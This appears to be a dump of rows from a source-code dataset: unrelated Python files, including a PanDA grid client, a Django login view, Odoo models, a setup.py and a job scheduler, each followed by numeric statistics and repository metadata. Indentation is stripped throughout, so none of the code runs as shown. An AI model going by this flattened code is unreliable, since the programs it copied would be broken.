for tmpInput in fileList:
if tmpInput != '':
strInput += '%s,' % tmpInput
if fileListName != '':
for tmpLine in open(fileListName):
tmpInput = re.sub('\n','',tmpLine)
if tmpInput != '':
strInput += '%s,' % tmpInput
strInput = strInput[:-1]
# make dataset name
userDatasetName = '%s.%s.%s/' % tuple(outDS.split('.')[:2]+[MiscUtils.wrappedUuidGen()])
# open run/event number list
evpFile = open(eventPickEvtList)
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/putEventPickingRequest'
data = {'runEventList' : evpFile.read(),
'eventPickDataType' : eventPickDataType,
'eventPickStreamName' : eventPickStreamName,
'eventPickDS' : eventPickDS,
'eventPickAmiTag' : eventPickAmiTag,
'userDatasetName' : userDatasetName,
'lockedBy' : lockedBy,
'giveGUID' : eventPickWithGUID,
'params' : params,
'inputFileList' : strInput,
}
if eventPickNumSites > 1:
data['eventPickNumSites'] = eventPickNumSites
if ei_api:
data['ei_api'] = ei_api
evpFile.close()
status,output = curl.post(url,data)
# failed
if status != 0 or output != True:
print output
errStr = "failed to request EventPicking"
tmpLog.error(errStr)
sys.exit(EC_Failed)
# return user dataset name
return True,userDatasetName
# check if enough sites have DBR
def checkEnoughSitesHaveDBR(dq2IDs):
# collect sites correspond to DQ2 IDs
sitesWithDBR = []
for tmpDQ2ID in dq2IDs:
tmpPandaSiteList = convertDQ2toPandaIDList(tmpDQ2ID)
for tmpPandaSite in tmpPandaSiteList:
if PandaSites.has_key(tmpPandaSite) and PandaSites[tmpPandaSite]['status'] == 'online':
if isExcudedSite(tmpPandaSite):
continue
sitesWithDBR.append(tmpPandaSite)
# count the number of online sites with DBR
nOnline = 0
nOnlineWithDBR = 0
nOnlineT1 = 0
nOnlineT1WithDBR = 0
for tmpPandaSite,tmpSiteStat in PandaSites.iteritems():
if tmpSiteStat['status'] == 'online':
# exclude test,long,local
if isExcudedSite(tmpPandaSite):
continue
# DQ2 free
if tmpSiteStat['ddm'] == 'local':
continue
nOnline += 1
if tmpPandaSite in PandaTier1Sites:
nOnlineT1 += 1
if tmpPandaSite in sitesWithDBR or tmpSiteStat['iscvmfs'] == True:
nOnlineWithDBR += 1
# DBR at enough T1 DISKs is used
if tmpPandaSite in PandaTier1Sites and tmpPandaSite in sitesWithDBR:
nOnlineT1WithDBR += 1
# enough replicas
if nOnlineWithDBR < 10:
return False
# threshold 90%
if float(nOnlineWithDBR) < 0.9 * float(nOnline):
return False
# not all T1s have the DBR
if nOnlineT1 != nOnlineT1WithDBR:
return False
# all OK
return True
# get latest DBRelease
def getLatestDBRelease(verbose=False):
# get logger
tmpLog = PLogger.getPandaLogger()
tmpLog.info('trying to get the latest version number for DBRelease=LATEST')
# get ddo datasets
ddoDatasets = getDatasets('ddo.*',verbose,True,onlyNames=True)
if ddoDatasets == {}:
tmpLog.error('failed to get a list of DBRelease datasets from DQ2')
sys.exit(EC_Failed)
# reverse sort to avoid redundant lookup
ddoDatasets = ddoDatasets.keys()
ddoDatasets.sort()
ddoDatasets.reverse()
# extract version number
latestVerMajor = 0
latestVerMinor = 0
latestVerBuild = 0
latestVerRev = 0
latestDBR = ''
for tmpName in ddoDatasets:
# ignore CDRelease
if ".CDRelease." in tmpName:
continue
# ignore user
if tmpName.startswith('ddo.user'):
continue
# use Atlas.Ideal
if not ".Atlas.Ideal." in tmpName:
continue
match = re.search('\.v(\d+)(_*[^\.]*)$',tmpName)
if match == None:
tmpLog.warning('cannot extract version number from %s' % tmpName)
continue
# ignore special DBRs
if match.group(2) != '':
continue
# get major,minor,build,revision numbers
tmpVerStr = match.group(1)
tmpVerMajor = 0
tmpVerMinor = 0
tmpVerBuild = 0
tmpVerRev = 0
try:
tmpVerMajor = int(tmpVerStr[0:2])
except:
pass
try:
tmpVerMinor = int(tmpVerStr[2:4])
except:
pass
try:
tmpVerBuild = int(tmpVerStr[4:6])
except:
pass
try:
tmpVerRev = int(tmpVerStr[6:])
except:
pass
# compare
if latestVerMajor > tmpVerMajor:
continue
elif latestVerMajor == tmpVerMajor:
if latestVerMinor > tmpVerMinor:
continue
elif latestVerMinor == tmpVerMinor:
if latestVerBuild > tmpVerBuild:
continue
elif latestVerBuild == tmpVerBuild:
if latestVerRev > tmpVerRev:
continue
# check replica locations to use well distributed DBRelease. i.e. to avoid DBR just created
tmpLocations = getLocations(tmpName,[],'',False,verbose,getDQ2IDs=True)
if not checkEnoughSitesHaveDBR(tmpLocations):
continue
# check contents to exclude reprocessing DBR
tmpDbrFileMap = queryFilesInDataset(tmpName,verbose)
if len(tmpDbrFileMap) != 1 or not tmpDbrFileMap.keys()[0].startswith('DBRelease'):
continue
# higher or equal version
latestVerMajor = tmpVerMajor
latestVerMinor = tmpVerMinor
latestVerBuild = tmpVerBuild
latestVerRev = tmpVerRev
latestDBR = tmpName
# failed
if latestDBR == '':
tmpLog.error('failed to get the latest version of DBRelease dataset from DQ2')
sys.exit(EC_Failed)
# get DBRelease file name
tmpList = queryFilesInDataset(latestDBR,verbose)
if len(tmpList) == 0:
tmpLog.error('DBRelease=%s is empty' % latestDBR)
sys.exit(EC_Failed)
# retrun dataset:file
retVal = '%s:%s' % (latestDBR,tmpList.keys()[0])
tmpLog.info('use %s' % retVal)
return retVal
# get inconsistent datasets which are complete in DQ2 but not in LFC
def getInconsistentDS(missList,newUsedDsList):
if missList == [] or newUsedDsList == []:
return []
inconDSs = []
# loop over all datasets
for tmpDS in newUsedDsList:
# escape
if missList == []:
break
# get file list
tmpList = queryFilesInDataset(tmpDS)
newMissList = []
# look for missing files
for tmpFile in missList:
if tmpList.has_key(tmpFile):
# append
if not tmpDS in inconDSs:
inconDSs.append(tmpDS)
else:
# keep as missing
newMissList.append(tmpFile)
# use new missing list for the next dataset
missList = newMissList
# return
return inconDSs
# submit task
def insertTaskParams(taskParams,verbose,properErrorCode=False):
"""Insert task parameters
args:
taskParams: a dictionary of task parameters
returns:
status code
0: communication succeeded to the panda server
255: communication failure
tuple of return code and message from the server
0: request is processed
1: duplication in DEFT
2: duplication in JEDI
3: accepted for incremental execution
4: server error
"""
# serialize
taskParamsStr = json.dumps(taskParams)
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/insertTaskParams'
data = {'taskParams':taskParamsStr,
'properErrorCode':properErrorCode}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
errtype,errvalue = sys.exc_info()[:2]
errStr = "ERROR insertTaskParams : %s %s" % (errtype,errvalue)
return EC_Failed,output+'\n'+errStr
# get history of job retry
def getRetryHistory(jediTaskID,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getRetryHistory'
data = {'jediTaskID':jediTaskID}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR getRetryHistory : %s %s" % (type,value)
return EC_Failed,None
# get PanDA IDs with TaskID
def getPandaIDsWithTaskID(jediTaskID,verbose=False):
"""Get PanDA IDs with TaskID
args:
jediTaskID: jediTaskID of the task to get lit of PanDA IDs
returns:
status code
0: communication succeeded to the panda server
255: communication failure
the list of PanDA IDs
"""
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# execute
url = baseURL + '/getPandaIDsWithTaskID'
data = {'jediTaskID':jediTaskID}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
errStr = "ERROR getPandaIDsWithTaskID : %s %s" % (type,value)
print errStr
return EC_Failed,output+'\n'+errStr
# reactivate task
def reactivateTask(jediTaskID,verbose=False):
"""Reactivate task
args:
jediTaskID: jediTaskID of the task to be reactivated
returns:
status code
0: communication succeeded to the panda server
255: communication failure
return: a tupple of return code and message
0: unknown task
1: succeeded
None: database error
"""
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/reactivateTask'
data = {'jediTaskID':jediTaskID}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
errtype,errvalue = sys.exc_info()[:2]
errStr = "ERROR reactivateTask : %s %s" % (errtype,errvalue)
return EC_Failed,output+'\n'+errStr
# get task status TaskID
def getTaskStatus(jediTaskID,verbose=False):
"""Get task status
args:
jediTaskID: jediTaskID of the task to get lit of PanDA IDs
returns:
status code
0: communication succeeded to the panda server
255: communication failure
the status string
"""
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# execute
url = baseURL + '/getTaskStatus'
data = {'jediTaskID':jediTaskID}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
errStr = "ERROR getTaskStatus : %s %s" % (type,value)
print errStr
return EC_Failed,output+'\n'+errStr
# get taskParamsMap with TaskID
def getTaskParamsMap(jediTaskID):
"""Get task status
args:
jediTaskID: jediTaskID of the task to get taskParamsMap
returns:
status code
0: communication succeeded to the panda server
255: communication failure
return: a tuple of return code and taskParamsMap
1: logical error
0: success
None: database error
"""
# instantiate curl
curl = _Curl()
# execute
url = baseURL + '/getTaskParamsMap'
data = {'jediTaskID':jediTaskID}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
errStr = "ERROR getTaskParamsMap : %s %s" % (type,value)
print errStr
return EC_Failed,output+'\n'+errStr
# get T1 sites
def getTier1sites():
global PandaTier1Sites
PandaTier1Sites = []
# FIXME : will be simplified once schedconfig has a tier field
for tmpCloud,tmpCloudVal in PandaClouds.iteritems():
for tmpDQ2ID in tmpCloudVal['tier1SE']:
# ignore NIKHEF
if tmpDQ2ID.startswith('NIKHEF'):
continue
# convert DQ2 ID to Panda Sites
tmpPandaSites = convertDQ2toPandaIDList(tmpDQ2ID)
for tmpPandaSite in tmpPandaSites:
if not tmpPandaSite in PandaTier1Sites:
PandaTier1Sites.append(tmpPandaSite)
# set X509_CERT_DIR
if os.environ.has_key('PANDA_DEBUG'):
print "DEBUG : setting X509_CERT_DIR"
if not os.environ.has_key('X509_CERT_DIR') or os.environ['X509_CERT_DIR'] == '':
tmp_x509_CApath = _x509_CApath()
if tmp_x509_CApath != '':
os.environ['X509_CERT_DIR'] = tmp_x509_CApath
else:
os.environ['X509_CERT_DIR'] = '/etc/grid-security/certificates'
if os.environ.has_key('PANDA_DEBUG'):
print "DEBUG : imported %s" % __name__
| 34.757889 | 149 | 0.555796 | 12,948 | 127,770 | 5.439527 | 0.108743 | 0.017492 | 0.017208 | 0.017308 | 0.402507 | 0.363207 | 0.339382 | 0.318397 | 0.298434 | 0.272011 | 0 | 0.01331 | 0.341982 | 127,770 | 3,675 | 150 | 34.767347 | 0.824407 | 0.103084 | 0 | 0.500369 | 0 | 0.002214 | 0.121755 | 0.011996 | 0 | 0 | 0 | 0.000544 | 0 | 0 | null | null | 0.007011 | 0.008487 | null | null | 0.042435 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0e1612123e14f431ace50f65fe276956a0f82853 | 815 | py | Python | tests/test_use_profile.py | popadi/git-profile | ca20173f63f57c21868c4c49c1e5c515d4bc87fd | [
"MIT"
] | 3 | 2019-08-24T19:24:49.000Z | 2019-08-30T09:44:46.000Z | tests/test_use_profile.py | sturmianseq/git-profiles | ca20173f63f57c21868c4c49c1e5c515d4bc87fd | [
"MIT"
] | 9 | 2019-09-01T13:25:25.000Z | 2019-09-05T19:52:25.000Z | tests/test_use_profile.py | popadi/git-profile | ca20173f63f57c21868c4c49c1e5c515d4bc87fd | [
"MIT"
] | 2 | 2020-09-14T16:22:26.000Z | 2021-08-15T08:24:09.000Z | import os
import sys
import pytest
from random import randrange
myPath = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, myPath + "/../")
import src.utils.messages as msg
from src.executor import executor, parser
from src.git_manager.git_manager import GitManager
@pytest.fixture(autouse=True)
def prepare():
git = GitManager({})
yield git
class TestUseProfiles:
def test_use_not_exist(self, capsys):
arg_parser = parser.get_arguments_parser()
# Set an account locally
fake_profile = "profile-{0}".format(randrange(100000))
arguments = arg_parser.parse_args(["use", fake_profile])
executor.execute_command(arguments)
out, err = capsys.readouterr()
assert not err
assert msg.ERR_NO_PROFILE.format(fake_profile) in out
| 25.46875 | 64 | 0.710429 | 108 | 815 | 5.175926 | 0.546296 | 0.059034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012103 | 0.188957 | 815 | 31 | 65 | 26.290323 | 0.833585 | 0.026994 | 0 | 0 | 0 | 0 | 0.022756 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 1 | 0.090909 | false | 0 | 0.318182 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
385257dce453f9dc6b74ab4ff222f4ac8563e40e | 1,997 | py | Python | server/editors/views.py | nickdotreid/opioid-mat-decision-aid | bbc2a0d8931d59cd6ab64b0b845e88c8dc1af5d1 | [
"MIT"
] | null | null | null | server/editors/views.py | nickdotreid/opioid-mat-decision-aid | bbc2a0d8931d59cd6ab64b0b845e88c8dc1af5d1 | [
"MIT"
] | 27 | 2018-09-30T07:59:21.000Z | 2020-11-05T19:25:41.000Z | server/editors/views.py | nickdotreid/opioid-mat-decision-aid | bbc2a0d8931d59cd6ab64b0b845e88c8dc1af5d1 | [
"MIT"
] | null | null | null | from django.contrib.auth import authenticate
from django.shortcuts import render
from rest_framework import serializers
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.authtoken.models import Token
from rest_framework.response import Response
from .models import Editor
from .models import User
class EditorAuthTokenSerializer(serializers.Serializer):
email = serializers.EmailField()
password = serializers.CharField(
trim_whitespace = False
)
class EditorLogin(APIView):
def post(self, request, *args, **kwargs):
serializer = EditorAuthTokenSerializer(
data=request.data
)
if not serializer.is_valid():
return Response(
data = serializer.errors,
status = status.HTTP_400_BAD_REQUEST
)
email = serializer.validated_data['email']
password = serializer.validated_data['password']
try:
user = User.objects.get(email = email)
except User.DoesNotExist:
return Response(
'User does not exist',
status = status.HTTP_401_UNAUTHORIZED
)
if not user.is_staff:
try:
editor = Editor.objects.get(user__email=email)
except Editor.DoesNotExist:
return Response(
'Editor does not exist',
status = status.HTTP_401_UNAUTHORIZED
)
user = authenticate(
request=request,
username=user.username,
password=password
)
if not user:
return Response(
'Incorrect password',
status = status.HTTP_401_UNAUTHORIZED
)
token, created = Token.objects.get_or_create(user=user)
return Response(
data = {
'email': user.email,
'token': token.key
}
)
| 31.203125 | 63 | 0.589885 | 188 | 1,997 | 6.143617 | 0.340426 | 0.034632 | 0.073593 | 0.049351 | 0.101299 | 0.074459 | 0.074459 | 0.074459 | 0 | 0 | 0 | 0.009146 | 0.343015 | 1,997 | 63 | 64 | 31.698413 | 0.871189 | 0 | 0 | 0.172414 | 0 | 0 | 0.040561 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017241 | false | 0.068966 | 0.155172 | 0 | 0.327586 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
385fbc5a17a50e64c4dcfcdc7d4027af3cdc018a | 1,688 | py | Python | Modules/Projects/models/project.py | Carlosma7/Odoo | c234fcc18d15d4d8369e237286bee610fd76ceee | [
"CC0-1.0"
] | null | null | null | Modules/Projects/models/project.py | Carlosma7/Odoo | c234fcc18d15d4d8369e237286bee610fd76ceee | [
"CC0-1.0"
] | null | null | null | Modules/Projects/models/project.py | Carlosma7/Odoo | c234fcc18d15d4d8369e237286bee610fd76ceee | [
"CC0-1.0"
] | null | null | null | # -*- coding: utf-8 -*-
from odoo import models, fields, api
from odoo.exceptions import ValidationError
# Class for project management and their relationships
class Projects(models.Model):
# Name of table
_name = "projects.project"
# Simple fields of the object
name = fields.Char(string="Project title", required=True)
identifier = fields.Char(string="ID", required=True)
locality = fields.Char(string="Locality")
province = fields.Char(string="Province")
start_date = fields.Date(string="Start date")
# Relational fields with other classes
department_ids = fields.Many2one('projects.department', string="Department") # department_id
employee_id = fields.Many2many('projects.employee', string="Employees") # employee_ids
# Constraint of the employees working in the project
@api.constrains('employee_id')
@api.multi
def _check_department(self):
for record in self:
# If we have a department
if record.department_ids:
# Iterate over all employees selected for the project
for employee_x in record.employee_id:
# If any of the employees doesn't belong to the same department of the project, then raise a ValidationError
if employee_x.department_id.name is not record.department_ids.name:
raise ValidationError("Employee %s is not valid because he doesn't belong to the project's department." % employee_x.name)
# Extension Class for the project class
class PriorityProjects(models.Model):
# We inherit from the project class and use the same table
_inherit = 'projects.project'
# Add a new field to save the deadline of a project
limit_date = fields.Date(string="Limit date", required=True) | 41.170732 | 129 | 0.742299 | 234 | 1,688 | 5.277778 | 0.380342 | 0.048583 | 0.051822 | 0.032389 | 0.02753 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002147 | 0.172393 | 1,688 | 41 | 130 | 41.170732 | 0.88189 | 0.331161 | 0 | 0 | 0 | 0 | 0.212093 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.681818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
385fcab1d94b44c44b147f9d7caf4a23de41ae7a | 402 | py | Python | models/food.py | ByK95/food_order | c3a40f00128cc381894b80b61ca6b919bbf49c4e | [
"MIT"
] | 1 | 2022-01-20T10:30:05.000Z | 2022-01-20T10:30:05.000Z | models/food.py | ByK95/food_order | c3a40f00128cc381894b80b61ca6b919bbf49c4e | [
"MIT"
] | null | null | null | models/food.py | ByK95/food_order | c3a40f00128cc381894b80b61ca6b919bbf49c4e | [
"MIT"
] | null | null | null | from app.shared.models import db
from app.models.mixins import ModelMixin
class Food(ModelMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255), nullable=False)
category_id = db.Column(db.Integer, db.ForeignKey("category.id"), nullable=False)
restourant_id = db.Column(
db.Integer, db.ForeignKey("restourant.id"), nullable=False
)
| 33.5 | 85 | 0.716418 | 57 | 402 | 5 | 0.438596 | 0.112281 | 0.140351 | 0.126316 | 0.284211 | 0.217544 | 0.217544 | 0 | 0 | 0 | 0 | 0.008798 | 0.151741 | 402 | 11 | 86 | 36.545455 | 0.826979 | 0 | 0 | 0 | 0 | 0 | 0.059701 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.777778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
386175f2b9107f26e003609e3390ad4e1d9fa916 | 1,574 | py | Python | setup.py | sjkingo/ticketus | 90f2781af9418e9e2c6470ca50c9a6af9ce098ff | [
"BSD-2-Clause"
] | 3 | 2019-02-09T10:52:55.000Z | 2021-09-19T14:14:36.000Z | setup.py | sjkingo/ticketus | 90f2781af9418e9e2c6470ca50c9a6af9ce098ff | [
"BSD-2-Clause"
] | null | null | null | setup.py | sjkingo/ticketus | 90f2781af9418e9e2c6470ca50c9a6af9ce098ff | [
"BSD-2-Clause"
] | 3 | 2018-03-04T18:05:02.000Z | 2021-09-19T14:14:38.000Z | from setuptools import find_packages, setup
from ticketus import __version__ as version
setup(
name='ticketus',
version=version,
license='BSD',
author='Sam Kingston',
author_email='sam@sjkwi.com.au',
description='Ticketus is a simple, no-frills ticketing system for helpdesks.',
url='https://github.com/sjkingo/ticketus',
install_requires=[
'Django >= 1.6.10',
'IMAPClient',
'django-grappelli',
'email-reply-parser',
'mistune',
'psycopg2',
'python-dateutil',
],
zip_safe=False,
include_package_data=True,
packages=find_packages(exclude=['ticketus_settings']),
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Information Technology',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python',
'Topic :: Communications :: Email',
'Topic :: Software Development :: Bug Tracking',
'Topic :: System :: Systems Administration',
],
scripts=[
'import_scripts/ticketus_import_freshdesk',
'import_scripts/ticketus_import_github',
'bin_scripts/ticketus_mailgw_imap4',
'bin_scripts/ticketus-admin',
],
)
| 32.791667 | 82 | 0.625159 | 152 | 1,574 | 6.328947 | 0.611842 | 0.066528 | 0.077963 | 0.054054 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009306 | 0.249047 | 1,574 | 47 | 83 | 33.489362 | 0.804569 | 0 | 0 | 0.066667 | 0 | 0 | 0.564168 | 0.086404 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.088889 | 0 | 0.088889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3869ffe900c403550a635fd5893cce20c49720b4 | 298 | py | Python | infra/controllers/errors/NotFoundError.py | JVGC/MyFinancesPython | 5e4ac02ea00c4ddab688dd0093eed3f3fb2ad826 | [
"MIT"
] | null | null | null | infra/controllers/errors/NotFoundError.py | JVGC/MyFinancesPython | 5e4ac02ea00c4ddab688dd0093eed3f3fb2ad826 | [
"MIT"
] | null | null | null | infra/controllers/errors/NotFoundError.py | JVGC/MyFinancesPython | 5e4ac02ea00c4ddab688dd0093eed3f3fb2ad826 | [
"MIT"
] | null | null | null | from infra.controllers.contracts import HttpResponse
class NotFoundError(HttpResponse):
def __init__(self, message) -> None:
status_code = 404
self.message = message
body = {
'message': self.message
}
super().__init__(body, status_code)
| 19.866667 | 52 | 0.620805 | 29 | 298 | 6.034483 | 0.62069 | 0.188571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014151 | 0.288591 | 298 | 14 | 53 | 21.285714 | 0.811321 | 0 | 0 | 0 | 0 | 0 | 0.02349 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3872e9a2f5c1058e44e25d6f8294aa9843e070f9 | 341 | py | Python | Items/Armors/Chest.py | saisua/RAF-Game | 79b2b618aa18c31a40c080865b58fac02c1cac68 | [
"MIT"
] | null | null | null | Items/Armors/Chest.py | saisua/RAF-Game | 79b2b618aa18c31a40c080865b58fac02c1cac68 | [
"MIT"
] | null | null | null | Items/Armors/Chest.py | saisua/RAF-Game | 79b2b618aa18c31a40c080865b58fac02c1cac68 | [
"MIT"
] | null | null | null | from .Armor import Armor
class Chest(Armor):
LIFE_PER_LEVEL = 100
PROTECTION_PER_LEVEL = 5
DAMAGE_PART = 1.2
def __init__(self, owner, level:int=None, life:int=None, protection:int=None):
self.name = "Chest armor"
super().__init__(owner, owner.level if level is None else level, life, protection)
| 26.230769 | 90 | 0.668622 | 49 | 341 | 4.387755 | 0.530612 | 0.097674 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022901 | 0.231672 | 341 | 13 | 91 | 26.230769 | 0.79771 | 0 | 0 | 0 | 0 | 0 | 0.032164 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
3877c817f150e95b91b3d8ee611f5c78f11d6109 | 4,121 | py | Python | executiontime_calculator.py | baumartig/paperboy | 01659cda235508eac66a50a9c16c4a6c531015bd | [
"Apache-2.0"
] | 3 | 2015-02-26T06:39:40.000Z | 2017-07-04T14:56:18.000Z | executiontime_calculator.py | baumartig/paperboy | 01659cda235508eac66a50a9c16c4a6c531015bd | [
"Apache-2.0"
] | null | null | null | executiontime_calculator.py | baumartig/paperboy | 01659cda235508eac66a50a9c16c4a6c531015bd | [
"Apache-2.0"
] | 1 | 2018-02-21T00:12:06.000Z | 2018-02-21T00:12:06.000Z | from datetime import datetime
from datetime import timedelta
from job import WEEKDAYS
from job import Job
def calculateNextExecution(job, now=datetime.now()):
executionTime = now.replace()
if job.executionType == "weekly":
diff = WEEKDAYS.index(job.executionDay) - now.weekday()
if diff < 0 and now.day < (-1 * diff):
diff += now.day
executionTime.replace(month=executionTime.month - 1)
executionTime = executionTime.replace(day=now.day + diff)
elif job.executionType == "monthly":
executionTime = executionTime.replace(day=job.executionDay)
# add the calculated difference
executionTime = executionTime.replace(hour=job.executionTime.hour,
minute=job.executionTime.minute,
second=job.executionTime.second,
microsecond=job.executionTime.microsecond)
addition = timedelta()
if now > executionTime:
#add interval
if job.executionType == "daily":
addition = timedelta(days=1)
if job.executionType == "weekly":
addition = timedelta(weeks=1)
elif job.executionType == "monthly":
if executionTime.month < 12:
executionTime = executionTime.replace(month=executionTime.month + 1)
else:
executionTime = executionTime.replace(month=1)
# add the delta
executionTime = executionTime + addition
# set the next execution date on the job
job.nextExecution = executionTime
def test():
test_monthly()
test_weekly()
testDaily()
return
def test_monthly():
print "TEST Monthly"
job = Job("testRef")
now = datetime(2014, 2, 2, 10)
# execute later
addition = timedelta(hours=1)
job.setExecution("monthly", (now + addition).time(), now.day)
calculateNextExecution(job, now)
assert datetime(2014, 2, 2, 11) == job.nextExecution, "Calculated wrong execution date: %s"\
% str(job.nextExecution)
# execute tomorrow
addition = timedelta(hours=-1)
job.setExecution("monthly", (now + addition).time(), now.day)
calculateNextExecution(job, now)
assert datetime(2014, 3, 2, 9) == job.nextExecution, "Calculated wrong execution date: %s"\
% str(job.nextExecution)
print "OK"
def test_weekly():
print "TEST Weekly"
job = Job("testRef")
now = datetime(2014, 2, 2, 10)
# execute later
addition = timedelta(hours=1)
job.setExecution("weekly", (now + addition).time(), "So")
calculateNextExecution(job, now)
assert datetime(2014, 2, 2, 11) == job.nextExecution, "Calculated wrong execution date: %s"\
% str(job.nextExecution)
# execute tomorrow
addition = timedelta(hours=-1)
job.setExecution("weekly", (now + addition).time(), "So")
calculateNextExecution(job, now)
assert datetime(2014, 2, 9, 9) == job.nextExecution, "Calculated wrong execution date: %s"\
% str(job.nextExecution)
print "OK"
def testDaily():
print "TEST Daily"
job = Job("testRef")
now = datetime(2014, 2, 2, 10)
# execute later
addition = timedelta(hours=1)
job.setExecution("daily", (now + addition).time())
calculateNextExecution(job, now)
assert datetime(2014, 2, 2, 11) == job.nextExecution, "Calculated wrong execution date: %s"\
% str(job.nextExecution)
# execute tomorrow
addition = timedelta(hours=-1)
job.setExecution("daily", (now + addition).time())
calculateNextExecution(job, now)
assert datetime(2014, 2, 3, 9) == job.nextExecution, "Calculated wrong execution date: %s"\
% str(job.nextExecution)
print "OK"
if __name__ == '__main__':
test()
| 33.504065 | 100 | 0.580199 | 408 | 4,121 | 5.830882 | 0.176471 | 0.087432 | 0.043716 | 0.035309 | 0.562842 | 0.562842 | 0.525851 | 0.525851 | 0.525851 | 0.525851 | 0 | 0.029588 | 0.31109 | 4,121 | 122 | 101 | 33.778689 | 0.808383 | 0.045377 | 0 | 0.481928 | 0 | 0 | 0.088963 | 0 | 0 | 0 | 0 | 0 | 0.072289 | 0 | null | null | 0 | 0.048193 | null | null | 0.072289 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.